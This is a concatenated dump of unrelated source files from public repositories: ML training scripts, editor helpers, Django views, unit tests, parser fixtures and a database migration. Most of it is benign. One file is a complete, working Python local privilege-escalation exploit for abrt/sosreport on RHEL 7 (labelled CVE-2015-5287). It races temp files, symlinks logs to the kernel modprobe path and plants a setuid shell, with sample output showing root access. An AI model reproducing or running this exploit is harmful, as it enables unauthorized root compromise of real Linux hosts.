pmi_threshold_coefficient=0,
topic_model_term_lists=topic_feature_builder.get_top_model_term_lists()
)
open('./demo_word_list_topic_model.html', 'wb').write(html.encode('utf-8'))
print('Open ./demo_word_list_topic_model.html in Chrome or Firefox.')
|
demo/one_shot/train.py | zhuguiqian/PaddleSlim | 926 | 12769885 | <gh_stars>100-1000
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import argparse
import ast
import numpy as np
from PIL import Image
import os
import paddle
import paddle.fluid as fluid
from paddle.fluid.optimizer import AdamOptimizer
from paddle.fluid.dygraph.nn import Conv2D, Pool2D, Linear
from paddle.fluid.dygraph.base import to_variable
from paddleslim.nas.one_shot import SuperMnasnet
from paddleslim.nas.one_shot import OneShotSearch
def parse_args():
parser = argparse.ArgumentParser("Training for Mnist.")
parser.add_argument(
"--use_data_parallel",
type=ast.literal_eval,
default=False,
help="The flag indicating whether to use data parallel mode to train the model."
)
parser.add_argument("-e", "--epoch", default=5, type=int, help="set epoch")
parser.add_argument("--ce", action="store_true", help="run ce")
args = parser.parse_args()
return args
class SimpleImgConv(fluid.dygraph.Layer):
def __init__(self,
num_channels,
num_filters,
filter_size,
conv_stride=1,
conv_padding=0,
conv_dilation=1,
conv_groups=1,
act=None,
use_cudnn=False,
param_attr=None,
bias_attr=None):
super(SimpleImgConv, self).__init__()
self._conv2d = Conv2D(
num_channels=num_channels,
num_filters=num_filters,
filter_size=filter_size,
stride=conv_stride,
padding=conv_padding,
dilation=conv_dilation,
groups=conv_groups,
param_attr=None,
bias_attr=None,
act=act,
use_cudnn=use_cudnn)
def forward(self, inputs):
x = self._conv2d(inputs)
return x
class MNIST(fluid.dygraph.Layer):
def __init__(self):
super(MNIST, self).__init__()
self._simple_img_conv_pool_1 = SimpleImgConv(1, 20, 2, act="relu")
self.arch = SuperMnasnet(
name_scope="super_net", input_channels=20, out_channels=20)
self._simple_img_conv_pool_2 = SimpleImgConv(20, 50, 2, act="relu")
self.pool_2_shape = 50 * 13 * 13
SIZE = 10
scale = (2.0 / (self.pool_2_shape**2 * SIZE))**0.5
self._fc = Linear(
self.pool_2_shape,
10,
param_attr=fluid.param_attr.ParamAttr(
initializer=fluid.initializer.NormalInitializer(
loc=0.0, scale=scale)),
act="softmax")
def forward(self, inputs, label=None, tokens=None):
x = self._simple_img_conv_pool_1(inputs)
x = self.arch(x, tokens=tokens) # addddddd
x = self._simple_img_conv_pool_2(x)
x = fluid.layers.reshape(x, shape=[-1, self.pool_2_shape])
x = self._fc(x)
if label is not None:
acc = fluid.layers.accuracy(input=x, label=label)
return x, acc
else:
return x
def test_mnist(model, tokens=None):
acc_set = []
avg_loss_set = []
batch_size = 64
test_reader = paddle.fluid.io.batch(
paddle.dataset.mnist.test(), batch_size=batch_size, drop_last=True)
for batch_id, data in enumerate(test_reader()):
dy_x_data = np.array([x[0].reshape(1, 28, 28)
for x in data]).astype('float32')
y_data = np.array(
[x[1] for x in data]).astype('int64').reshape(batch_size, 1)
img = to_variable(dy_x_data)
label = to_variable(y_data)
label.stop_gradient = True
prediction, acc = model.forward(img, label, tokens=tokens)
loss = fluid.layers.cross_entropy(input=prediction, label=label)
avg_loss = fluid.layers.mean(loss)
acc_set.append(float(acc.numpy()))
avg_loss_set.append(float(avg_loss.numpy()))
if batch_id % 100 == 0:
print("Test - batch_id: {}".format(batch_id))
# get test acc and loss
acc_val_mean = np.array(acc_set).mean()
avg_loss_val_mean = np.array(avg_loss_set).mean()
return acc_val_mean
def train_mnist(args, model, tokens=None):
epoch_num = args.epoch
BATCH_SIZE = 64
adam = AdamOptimizer(
learning_rate=0.001, parameter_list=model.parameters())
train_reader = paddle.fluid.io.batch(
paddle.dataset.mnist.train(), batch_size=BATCH_SIZE, drop_last=True)
if args.use_data_parallel:
train_reader = fluid.contrib.reader.distributed_batch_reader(
train_reader)
for epoch in range(epoch_num):
for batch_id, data in enumerate(train_reader()):
dy_x_data = np.array([x[0].reshape(1, 28, 28)
for x in data]).astype('float32')
y_data = np.array(
[x[1] for x in data]).astype('int64').reshape(-1, 1)
img = to_variable(dy_x_data)
label = to_variable(y_data)
label.stop_gradient = True
cost, acc = model.forward(img, label, tokens=tokens)
loss = fluid.layers.cross_entropy(cost, label)
avg_loss = fluid.layers.mean(loss)
if args.use_data_parallel:
avg_loss = model.scale_loss(avg_loss)
avg_loss.backward()
model.apply_collective_grads()
else:
avg_loss.backward()
adam.minimize(avg_loss)
# save checkpoint
model.clear_gradients()
if batch_id % 1 == 0:
print("Loss at epoch {} step {}: {:}".format(epoch, batch_id,
avg_loss.numpy()))
model.eval()
test_acc = test_mnist(model, tokens=tokens)
model.train()
print("Loss at epoch {} , acc is: {}".format(epoch, test_acc))
save_parameters = (not args.use_data_parallel) or (
args.use_data_parallel and
fluid.dygraph.parallel.Env().local_rank == 0)
if save_parameters:
fluid.save_dygraph(model.state_dict(), "save_temp")
print("checkpoint saved")
if __name__ == '__main__':
args = parse_args()
place = fluid.CPUPlace()
with fluid.dygraph.guard(place):
model = MNIST()
# step 1: training super net
#train_mnist(args, model)
# step 2: search
best_tokens = OneShotSearch(model, test_mnist)
# step 3: final training
# train_mnist(args, model, best_tokens)
|
scripts/cpsg.py | skyhoshi/concfg | 864 | 12769889 | """
cpsg.py
~~~~~~
Concfg Preset Screenshot Generator
Only works in pure powershell/pwsh session, does not work in terminal like cmder.
Prerequisites:
Python3.4+, Pillow, jinja2, pywin32
"""
import os
import sys
import glob
import time
import shutil
import argparse
import win32gui
import subprocess
import win32process
from PIL import ImageGrab
from jinja2 import Template
LEGACY_PWSH = False
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
PRESETS_DIR = os.path.join(SCRIPT_DIR, os.pardir, 'presets')
PRESET_EXAMPLES_DIR = os.path.join(SCRIPT_DIR, os.pardir, 'preset_examples')
SKIP_LIST = ['basic', 'basic-reset']
def get_hwnds_for_pid(pid):
def callback(hwnd, hwnds):
if win32gui.IsWindowVisible(hwnd) and win32gui.IsWindowEnabled(hwnd):
_, found_pid = win32process.GetWindowThreadProcessId(hwnd)
if found_pid == pid:
hwnds.append(hwnd)
return True
hwnds = []
win32gui.EnumWindows(callback, hwnds)
return hwnds
def get_presets():
files = glob.glob(os.path.join(PRESETS_DIR, '*.json'))
presets = []
for item in files:
presets.append((os.path.splitext(os.path.basename(item))[0], item))
# preset pair list [(name, path), (name, path), ...]
return presets
def gens_for_preset(preset):
exe = 'powershell' if LEGACY_PWSH else 'pwsh'
print("Taking screenshot of preset '{0}'...".format(preset[0]))
# set color preset
pwsh = subprocess.Popen(
'{0} -noprofile -file {1}/setcolors.ps1 -preset {2}'.format(exe, SCRIPT_DIR, preset[1]),
creationflags=subprocess.CREATE_NEW_CONSOLE
)
# waiting for exit
time.sleep(4.0)
# print out color table then take screenshot
pwsh = subprocess.Popen(
'{0} -noprofile -noexit -file {1}/outcolors.ps1'.format(exe, SCRIPT_DIR),
creationflags=subprocess.CREATE_NEW_CONSOLE
)
# waiting for process
time.sleep(2.0)
for hwnd in get_hwnds_for_pid(pwsh.pid):
win32gui.SetForegroundWindow(hwnd)
bbox = win32gui.GetWindowRect(hwnd)
# remove window box shadow
crop_bbox = (bbox[0]+7, bbox[1], bbox[2]-7, bbox[3]-7)
img = ImageGrab.grab(crop_bbox)
if not os.path.exists(PRESET_EXAMPLES_DIR):
os.makedirs(PRESET_EXAMPLES_DIR)
img.save(os.path.join(PRESET_EXAMPLES_DIR, '{0}.png'.format(preset[0])))
pwsh.kill()
def img_dict(direntry):
return {
'name': direntry.name.replace('.png', ''),
'path': direntry.name
}
def is_img(direntry):
if direntry.is_file and direntry.name.endswith('.png'):
return True
return False
if __name__ == '__main__':
# Usage: python -m cpsg [args]
parser = argparse.ArgumentParser(
description='Concfg Preset Screenshot Generator')
parser.add_argument("-a", "--all",
help="generate screenshot for all presets",
action="store_true")
parser.add_argument("-l", "--legacy",
help="pass this option if you use Windows PowerShell",
action="store_true")
parser.add_argument("-p", "--preset",
help="generate screenshot for single preset")
parser.add_argument("-u", "--update",
help="also update the screenshot README",
action="store_true")
args = parser.parse_args()
if args.all or args.preset:
if not shutil.which('colortool.exe'):
print("Make sure you have 'ColorTool' installed.")
sys.exit(0)
input("NOTICE: Do not have other operations while the script runs, "
"or it will be interrupted when taking screenshots. "
"Hit Enter to continue: ")
presets = get_presets()
if args.legacy:
LEGACY_PWSH = True
if args.all:
for item in presets:
# skip non-color presets
if not item[0] in SKIP_LIST:
gens_for_preset(item)
elif args.preset:
# skip non-color presets
if not args.preset in SKIP_LIST:
match = [item for item in presets if item[0] == args.preset]
if len(match):
gens_for_preset(match[0])
else:
print("No preset named '{0}'.".format(args.preset))
sys.exit(0)
if args.update:
print('Updating screenshots README.md...')
# Get template
with open(os.path.join(SCRIPT_DIR, 'readme.jinja2')) as templateData:
template = Template(templateData.read())
# Get images
images = [img_dict(direntry) for direntry in os.scandir(PRESET_EXAMPLES_DIR) if is_img(direntry)]
images.sort(key=lambda x: x['name'])
# Generate README
with open(os.path.join(PRESET_EXAMPLES_DIR, 'README.md'), 'w') as readme:
readme.write(template.render(images=images))
else:
parser.print_help()
sys.exit(0)
|
egs/zeroth/s5/data/local/lm/buildLM/_scripts_/sumStatUniqWords.py | SYHPARK/kaldi | 330 | 12769942 | <filename>egs/zeroth/s5/data/local/lm/buildLM/_scripts_/sumStatUniqWords.py
#!/usr/bin/env python3
# summation all the stat from uniqWord.JOB
# build uniq word dictionary with count
#
# Copyright 2017 Atlas Guide (Author : <NAME>)
#
# Apache 2.0
#
import fileinput
import json
import sys
def main():
nLine = 1
word_dict = dict()
#f_out = open('json_words' ,'w')
word_count = 0
for line in fileinput.input():
# empty line
if not line.strip():
continue
if nLine % 1000 == 0:
print(" %d line processed"%nLine, end='\r', file=sys.stderr)
nLine += 1
tstrList = line.split()
if len(tstrList) < 2:
continue
wordList = tstrList[1:]
# from refining, incomming field could be multiple
for curr_word in wordList:
curr_count = int(tstrList[0])
if curr_word not in word_dict:
if len(wordList) == 1:
word_dict[curr_word] = curr_count
else:
word_dict[curr_word] = 1
word_count += 1
else:
word_dict[curr_word] += curr_count
print(" REPORT: {} uniq. words are founded".format(word_count), file=sys.stderr)
print(" now sorting", file=sys.stderr)
sortedResult=sorted(word_dict.items(), key=lambda x:x[1], reverse=True)
#resultDict = {a[0]: a[1] for a in sortedResult}
#json_dump = json.dumps(resultDict, f_out, indent=4, ensure_ascii=False)
for item in sortedResult:
print(item[0], item[1])
if __name__ == '__main__':
main()
|
tests/source_image_caching_resolver_ut.py | jamieparkinson/loris | 150 | 12769958 | <gh_stars>100-1000
import os
import shutil
import unittest
from tests.abstract_resolver import AbstractResolverTest
from loris import resolver
class SourceImageCachingResolverTest(AbstractResolverTest, unittest.TestCase):
def setUp(self):
super(SourceImageCachingResolverTest, self).setUp()
tests_dir = os.path.dirname(os.path.realpath(__file__))
self.cache_dir = os.path.join(tests_dir, 'cache')
config = {
'source_root': os.path.join(tests_dir, 'img'),
'cache_root': self.cache_dir
}
self.identifier = '01/02/0001.jp2'
self.expected_filepath = os.path.join(
self.cache_dir,
self.identifier
)
self.not_identifier = 'DOES_NOT_EXIST.jp2'
self.expected_format = 'jp2'
self.resolver = resolver.SourceImageCachingResolver(config)
def test_resolve(self):
super(SourceImageCachingResolverTest, self).test_resolve()
# Make sure the file exists in the cache
self.assertTrue(os.path.isfile(self.expected_filepath))
def tearDown(self):
# Clean Up the cache directory
if os.path.exists(self.cache_dir):
shutil.rmtree(self.cache_dir)
|
tests/api/single_load/test_optional_types.py | ssato/python-anyconfig | 213 | 12769959 | #
# Copyright (C) 2021 <NAME> <<EMAIL>>
# License: MIT
#
# pylint: disable=missing-docstring
import unittest
import anyconfig.api
from . import common
LOADER_TYPES = frozenset(anyconfig.api.list_types())
@unittest.skipIf('yaml' not in LOADER_TYPES,
'yaml loader is not available')
class YamlTestCase(common.TestCase):
kind = 'yaml'
pattern = '*.yml'
@unittest.skipIf('toml' not in LOADER_TYPES,
'toml loader is not available')
class TomlTestCase(YamlTestCase):
kind = 'toml'
pattern = '*.toml'
# vim:sw=4:ts=4:et:
|
floo/editor.py | barrasch/floobits-sublime | 124 | 12769988 | import sys
import os
try:
import sublime
except Exception:
pass
NEW_ACCOUNT_TXT = '''Welcome {username}!\n\nYou're all set to collaborate. You should check out our docs at https://{host}/help/plugins/sublime#usage.
You must run 'Floobits - Complete Sign Up' so you can log in to the website.'''
LINKED_ACCOUNT_TXT = '''Welcome {username}!\n\nYou are all set to collaborate.
You may want to check out our docs at https://{host}/help/plugins/sublime#usage'''
def name():
if sys.version_info < (3, 0):
py_version = 2
else:
py_version = 3
return 'Sublime Text %s' % py_version
def codename():
return 'sublime'
def ok_cancel_dialog(dialog):
return sublime.ok_cancel_dialog(dialog)
def error_message(msg):
sublime.error_message(msg)
def status_message(msg):
sublime.status_message(msg)
def platform():
return sublime.platform()
def set_timeout(f, timeout):
sublime.set_timeout(f, timeout)
def call_timeouts():
return
def message_dialog(msg):
sublime.message_dialog(msg)
def open_file(file):
win = sublime.active_window()
if win:
win.open_file(file)
def get_line_endings(path=None):
ending = sublime.load_settings('Preferences.sublime-settings').get('default_line_ending')
if ending == 'system':
return os.linesep
if ending == 'windows':
return '\r\n'
return '\n'
def select_auth(*args):
window, auths, cb = args
if not auths:
return cb(None)
auths = dict(auths)
for k, v in auths.items():
v['host'] = k
if len(auths) == 1:
return cb(list(auths.values())[0])
opts = [[h, 'Connect as %s' % a.get('username')] for h, a in auths.items()]
opts.append(['Cancel', ''])
def on_account(index):
if index < 0 or index >= len(auths):
# len(hosts) is cancel, appended to opts at end below
return cb(None)
host = opts[index][0]
return cb(auths[host])
flags = 0
if hasattr(sublime, 'KEEP_OPEN_ON_FOCUS_LOST'):
flags |= sublime.KEEP_OPEN_ON_FOCUS_LOST
return window.show_quick_panel(opts, on_account, flags)
|
reviewboard/accounts/views.py | amalik2/reviewboard | 921 | 12770007 | from __future__ import unicode_literals
import logging
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.forms.forms import ErrorDict
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404
from django.utils import six
from django.utils.decorators import method_decorator
from django.utils.functional import cached_property
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
from django.views.decorators.csrf import csrf_protect
from django.views.generic.base import TemplateView
from djblets.auth.views import register
from djblets.configforms.views import ConfigPagesView
from djblets.features.decorators import feature_required
from djblets.forms.fieldsets import filter_fieldsets
from djblets.siteconfig.models import SiteConfiguration
from djblets.util.compat.django.shortcuts import render
from djblets.util.decorators import augment_method_from
from djblets.views.generic.etag import ETagViewMixin
from reviewboard.accounts.backends import get_enabled_auth_backends
from reviewboard.accounts.forms.registration import RegistrationForm
from reviewboard.accounts.mixins import CheckLoginRequiredViewMixin
from reviewboard.accounts.models import Profile
from reviewboard.accounts.pages import AccountPage, OAuth2Page, PrivacyPage
from reviewboard.accounts.privacy import is_consent_missing
from reviewboard.admin.decorators import check_read_only
from reviewboard.avatars import avatar_services
from reviewboard.notifications.email.decorators import preview_email
from reviewboard.notifications.email.message import \
prepare_password_changed_mail
from reviewboard.oauth.features import oauth2_service_feature
from reviewboard.oauth.forms import (UserApplicationChangeForm,
UserApplicationCreationForm)
from reviewboard.oauth.models import Application
from reviewboard.site.mixins import CheckLocalSiteAccessViewMixin
from reviewboard.site.urlresolvers import local_site_reverse
class UserInfoboxView(CheckLoginRequiredViewMixin,
CheckLocalSiteAccessViewMixin,
ETagViewMixin,
TemplateView):
"""Displays information on a user, for use in user pop-up infoboxes.
This is meant to be embedded in other pages, rather than being
a standalone page.
"""
template_name = 'accounts/user_infobox.html'
def __init__(self, **kwargs):
"""Initialize a view for the request.
Args:
**kwargs (dict):
Keyword arguments passed to :py:meth:`as_view`.
"""
super(UserInfoboxView, self).__init__(**kwargs)
self._lookup_user = None
self._show_profile = None
self._timezone = None
def get_etag_data(self, request, username, *args, **kwargs):
"""Return an ETag for the view.
This will look up some state needed for the request and generate a
suitable ETag.
Args:
request (django.http.HttpRequest):
The HTTP request from the client.
username (unicode):
The username of the user being looked up.
*args (tuple):
Positional arguments to pass to the handler.
**kwargs (tuple):
Keyword arguments to pass to the handler.
These will be arguments provided by the URL pattern.
Returns:
unicode:
The ETag for the page.
"""
from reviewboard.extensions.hooks import UserInfoboxHook
user = get_object_or_404(User, username=username)
self._lookup_user = user
profile = user.get_profile()
self._show_profile = user.is_profile_visible(request.user)
self._timezone = profile.timezone
etag_data = [
user.first_name,
user.last_name,
user.email,
six.text_type(user.last_login),
six.text_type(settings.TEMPLATE_SERIAL),
six.text_type(self._show_profile),
self._timezone,
]
if avatar_services.avatars_enabled:
avatar_service = avatar_services.for_user(user)
if avatar_service:
etag_data.extend(avatar_service.get_etag_data(user))
local_site = self.local_site
for hook in UserInfoboxHook.hooks:
try:
etag_data.append(hook.get_etag_data(
user=user,
request=request,
local_site=local_site))
except Exception as e:
logging.exception('Error when running UserInfoboxHook.'
'get_etag_data method in extension "%s": %s',
hook.extension.id, e)
return ':'.join(etag_data)
def get_context_data(self, **kwargs):
"""Return data for the template.
This will return information on the user, along with information from
any extension hooks used for the page.
Args:
**kwargs (tuple):
Additional keyword arguments from the URL pattern.
Returns:
dict:
Context data for the template.
"""
from reviewboard.extensions.hooks import UserInfoboxHook
# These are accessed several times, so bring them in to reduce
# attribute lookups.
user = self._lookup_user
username = user.username
local_site = self.local_site
extra_content = []
for hook in UserInfoboxHook.hooks:
try:
extra_content.append(hook.render(
user=user,
request=self.request,
local_site=local_site))
except Exception as e:
logging.exception('Error when running UserInfoboxHook.'
'render method in extension "%s": %s',
hook.extension.id, e)
review_requests_url = local_site_reverse('user', local_site=local_site,
args=[username])
reviews_url = local_site_reverse('user-grid', local_site=local_site,
args=[username, 'reviews'])
has_avatar = (
avatar_services.avatars_enabled and
avatar_services.for_user(user) is not None
)
return {
'extra_content': mark_safe(''.join(extra_content)),
'full_name': user.get_full_name(),
'has_avatar': has_avatar,
'infobox_user': user,
'review_requests_url': review_requests_url,
'reviews_url': reviews_url,
'show_profile': self._show_profile,
'timezone': self._timezone,
}
@csrf_protect
def account_register(request, next_url='dashboard'):
"""Display the appropriate registration page.
If registration is enabled and the selected authentication backend supports
creation of users, this will return the appropriate registration page. If
registration is not supported, this will redirect to the login view.
"""
siteconfig = SiteConfiguration.objects.get_current()
auth_backends = get_enabled_auth_backends()
if (auth_backends[0].supports_registration and
siteconfig.get('auth_enable_registration') and
not siteconfig.get('site_read_only')):
response = register(request, next_page=reverse(next_url),
form_class=RegistrationForm)
return response
return HttpResponseRedirect(reverse("login"))
class MyAccountView(ConfigPagesView):
"""Displays the My Account page containing user preferences.
The page will be built based on registered pages and forms. This makes
it easy to plug in new bits of UI for the page, which is handy for
extensions that want to offer customization for users.
"""
title = _('My Account')
css_bundle_names = [
'account-page',
]
js_bundle_names = [
'3rdparty-jsonlint',
'config-forms',
'account-page',
]
@method_decorator(login_required)
@method_decorator(check_read_only)
@augment_method_from(ConfigPagesView)
def dispatch(self, *args, **kwargs):
"""Handle the view.
This just falls back to the djblets ConfigPagesView.dispatch
implementation.
"""
pass
@property
def nav_title(self):
"""Get the title for the navigation section."""
return self.request.user.username
@property
def page_classes(self):
"""The list of page classes for this view.
If the user is missing any consent requirements or has not accepted
the privacy policy/terms of service, only the privacy page will be
shown.
"""
if self.is_user_missing_consent:
return [AccountPage.registry.get('page_id', PrivacyPage.page_id)]
return list(AccountPage.registry)
@cached_property
def ordered_user_local_sites(self):
"""Get the user's local sites, ordered by name."""
return self.request.user.local_site.order_by('name')
@property
def render_sidebar(self):
"""Whether or not to render the sidebar.
If the user is missing any consent requirements or has not accepted
the privacy policy/terms of service, the sidebar will not render.
This is to prevent the user from navigating away from the privacy page
before making decisions.
"""
return not self.is_user_missing_consent
@cached_property
def is_user_missing_consent(self):
"""Whether or not the user is missing consent."""
return is_consent_missing(self.request.user)
@login_required
@preview_email(prepare_password_changed_mail)
def preview_password_changed_email(request):
return {
'user': request.user,
}
@login_required
@feature_required(oauth2_service_feature)
def edit_oauth_app(request, app_id=None):
"""Create or edit an OAuth2 application.
Args:
request (django.http.HttpRequest):
The current HTTP request.
app_id (int, optional):
The ID of the application to edit.
If this argument is ``None`` a new application will be edited.
Returns:
django.http.HttpResponse:
The rendered view.
"""
# If we import this at global scope, it will cause issues with admin sites
# being automatically registered.
from reviewboard.oauth.admin import ApplicationAdmin
if app_id:
app = get_object_or_404(
Application,
pk=app_id,
user=request.user,
)
form_cls = UserApplicationChangeForm
fieldsets = ApplicationAdmin.fieldsets
else:
app = None
form_cls = UserApplicationCreationForm
fieldsets = ApplicationAdmin.add_fieldsets
if request.method == 'POST':
form_data = request.POST.copy()
form = form_cls(user=request.user, data=form_data, initial=None,
instance=app)
if form.is_valid():
app = form.save()
if app_id is not None:
next_url = OAuth2Page.get_absolute_url()
else:
next_url = reverse('edit-oauth-app', args=(app.pk,))
return HttpResponseRedirect(next_url)
else:
form = form_cls(user=request.user, data=None, initial=None,
instance=app)
# Show a warning at the top of the form when the form is disabled for
# security.
#
# We don't need to worry about full_clean not being called (which would
# be if we went through form.errors) because this form will never be
# saved.
if app and app.is_disabled_for_security:
form._errors = ErrorDict({
'__all__': form.error_class(
[form.DISABLED_FOR_SECURITY_ERROR],
),
})
return render(
request=request,
template_name='accounts/edit_oauth_app.html',
context={
'app': app,
'form': form,
'fieldsets': filter_fieldsets(form=form_cls,
fieldsets=fieldsets),
'oauth2_page_url': OAuth2Page.get_absolute_url(),
'request': request,
})
|
test/test_image_streamer_deployment_group_facts.py | nabhajit-ray/oneview-ansible | 108 | 12770009 | <reponame>nabhajit-ray/oneview-ansible
#!/usr/bin/python
# -*- coding: utf-8 -*-
###
# Copyright (2016-2017) Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
import pytest
from hpe_test_utils import ImageStreamerBaseFactsTest
from oneview_module_loader import DeploymentGroupFactsModule
@pytest.mark.resource(TestDeploymentGroupFactsModule='deployment_groups')
class TestDeploymentGroupFactsModule(ImageStreamerBaseFactsTest):
"""
ImageStreamerBaseFactsTest has common tests for the parameters support.
"""
DEPLOYMENT_GROUP = dict(
name="OSS",
uri="/rest/deployment-group/d1c7b09a-6c7b-4ae0-b68e-ed208ccde1b0")
def test_get_all_deployment_groups(self):
self.resource.get_all.return_value = [self.DEPLOYMENT_GROUP]
self.mock_ansible_module.params = self.EXAMPLES[0]['image_streamer_deployment_group_facts']
DeploymentGroupFactsModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts=dict(deployment_groups=[self.DEPLOYMENT_GROUP])
)
def test_get_a_deployment_group_by_name(self):
self.resource.get_by.return_value = [self.DEPLOYMENT_GROUP]
self.mock_ansible_module.params = self.EXAMPLES[4]['image_streamer_deployment_group_facts']
DeploymentGroupFactsModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts=dict(deployment_groups=[self.DEPLOYMENT_GROUP])
)
if __name__ == '__main__':
pytest.main([__file__])
|
Lib/test/bugs/pr183.py | jimmyyu2004/jython | 332 | 12770013 | <gh_stars>100-1000
# Test case for PR#183; print of a recursive PyStringMap causes a JVM stack
# overflow.
g = globals()
print(g)
|
data/exploits/cve-2015-5287/sosreport-rhel7.py | OsmanDere/metasploit-framework | 26,932 | 12770015 | <reponame>OsmanDere/metasploit-framework<filename>data/exploits/cve-2015-5287/sosreport-rhel7.py
#!/usr/bin/python
# CVE-2015-5287 (?)
# abrt/sosreport RHEL 7.0/7.1 local root
# rebel 09/2015
# [user@localhost ~]$ python sosreport-rhel7.py
# crashing pid 19143
# waiting for dump directory
# dump directory: /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143
# waiting for sosreport directory
# sosreport: sosreport-localhost.localdomain-20151130194114
# waiting for tmpfiles
# tmpfiles: ['tmpurfpyY', 'tmpYnCfnQ']
# moving directory
# moving tmpfiles
# tmpurfpyY -> tmpurfpyY.old
# tmpYnCfnQ -> tmpYnCfnQ.old
# waiting for sosreport to finish (can take several minutes)........................................done
# success
# bash-4.2# id
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# bash-4.2# cat /etc/redhat-release
# Red Hat Enterprise Linux Server release 7.1 (Maipo)
import os,sys,glob,time,sys,socket
payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"
pid = os.fork()
if pid == 0:
os.execl("/usr/bin/sleep","sleep","100")
time.sleep(0.5)
print "crashing pid %d" % pid
os.kill(pid,11)
print "waiting for dump directory"
def waitpath(p):
while 1:
r = glob.glob(p)
if len(r) > 0:
return r
time.sleep(0.05)
dumpdir = waitpath("/var/tmp/abrt/cc*%d" % pid)[0]
print "dump directory: ", dumpdir
os.chdir(dumpdir)
print "waiting for sosreport directory"
sosreport = waitpath("sosreport-*")[0]
print "sosreport: ", sosreport
print "waiting for tmpfiles"
tmpfiles = waitpath("tmp*")
print "tmpfiles: ", tmpfiles
print "moving directory"
os.rename(sosreport, sosreport + ".old")
os.mkdir(sosreport)
os.chmod(sosreport,0777)
os.mkdir(sosreport + "/sos_logs")
os.chmod(sosreport + "/sos_logs",0777)
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/sos.log")
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/ui.log")
print "moving tmpfiles"
for x in tmpfiles:
print "%s -> %s" % (x,x + ".old")
os.rename(x, x + ".old")
open(x, "w+").write("/tmp/hax.sh\n")
os.chmod(x,0666)
os.chdir("/")
sys.stderr.write("waiting for sosreport to finish (can take several minutes)..")
def trigger():
open("/tmp/hax.sh","w+").write(payload)
os.chmod("/tmp/hax.sh",0755)
try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
except: pass
time.sleep(0.5)
try:
os.stat("/tmp/sh")
except:
print "could not create suid"
sys.exit(-1)
print "success"
os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
sys.exit(-1)
for x in xrange(0,60*10):
if "/tmp/hax" in open("/proc/sys/kernel/modprobe").read():
print "done"
trigger()
time.sleep(1)
sys.stderr.write(".")
print "timed out" |
src/obfuscapk/obfuscators/new_signature/__init__.py | Elyorbe/Obfuscapk | 688 | 12770040 | <reponame>Elyorbe/Obfuscapk
#!/usr/bin/env python3
from .new_signature import NewSignature
|
src/genie/libs/parser/iosxe/tests/ShowPlatformSoftwareFedactiveFnfEtAnalyticsFlows/cli/equal/golden_output_expected.py | balmasea/genieparser | 204 | 12770041 | <reponame>balmasea/genieparser<filename>src/genie/libs/parser/iosxe/tests/ShowPlatformSoftwareFedactiveFnfEtAnalyticsFlows/cli/equal/golden_output_expected.py
expected_output = {'current-eta-records': 0,
'excess-packets-received': 60,
'excess-syn-received': 0,
'total-eta-fnf': 2,
'total-eta-idp': 2,
'total-eta-records': 4,
'total-eta-splt': 2,
'total-packets-out-of-order': 0,
'total-packets-received': 80,
'total-packets-retransmitted': 0}
|
iepy/webui/corpus/migrations/0014_data_migration_move_metadata.py | francolq/iepy | 813 | 12770092 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import logging
from django.db import models, migrations
logging.basicConfig(format="%(asctime)-15s %(message)s")
logger = logging.getLogger(__file__)
logger.setLevel(logging.INFO)
BULK_SIZE = 2500
def move_metadata(apps, schema_editor):
IEDocument = apps.get_model('corpus', 'IEDocument')
IEDocumentMetadata = apps.get_model('corpus', 'IEDocumentMetadata')
documents = IEDocument.objects.all()
total = documents.count()
objects_to_create = []
logger.info("Creating missing documents metadata objects")
for i, document in enumerate(documents.iterator()):
if i % BULK_SIZE == 0:
logger.info("Created {} out of {}".format(i, total))
if objects_to_create:
IEDocumentMetadata.objects.bulk_create(objects_to_create)
objects_to_create = []
objects_to_create.append(IEDocumentMetadata(
title=document.title,
url=document.url,
items=document.metadata,
document_tmp=document
))
if objects_to_create:
logger.info("Created {} out of {}".format(i+1, total))
IEDocumentMetadata.objects.bulk_create(objects_to_create)
logger.info("Updating documents to point to their metadata objects")
doc_mtds = IEDocumentMetadata.objects.filter(document_tmp__metadata_fk__isnull=True)
total = doc_mtds.count()
for i, doc_mtd in enumerate(doc_mtds):
if i % BULK_SIZE == 0:
logger.info("Updated {} out of {}".format(i, total))
IEDocument.objects.filter(pk=doc_mtd.document_tmp_id).update(metadata_fk=doc_mtd.id)
logger.info("Updated {} out of {}".format(total, total))
class Migration(migrations.Migration):
dependencies = [
('corpus', '0013_create_metadata_model'),
]
operations = [
migrations.RunPython(move_metadata),
]
|
metrics/fid.py | iviazovetskyi/rewriting | 526 | 12770107 | from __future__ import absolute_import, division, print_function
import torch
import warnings
